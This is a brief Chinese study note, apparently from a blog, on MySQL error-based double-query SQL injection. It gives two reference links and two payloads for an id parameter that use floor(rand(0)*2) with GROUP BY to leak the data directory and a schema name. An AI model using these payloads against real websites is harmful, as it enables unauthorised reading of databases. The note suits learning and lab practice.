参考
https://blog.csdn.net/weixin_43901998/article/details/105227678
https://mochazz.github.io/2017/09/23/Double_%20SQL_Injection/#0x01-%E5%8F%8C%E6%9F%A5%E8%AF%A2
作者水平有限,如发现错误请指出。
payload
?id=1' union select 1,2,count(1) from information_schema.tables group by concat(floor(rand(0)*2),@@datadir) --+
payload
?id=1' union select 1,2,count(1) from information_schema.tables group by concat(floor(rand(0)*2),(select schema_name from information_schema.schemata limit 0,1)) --+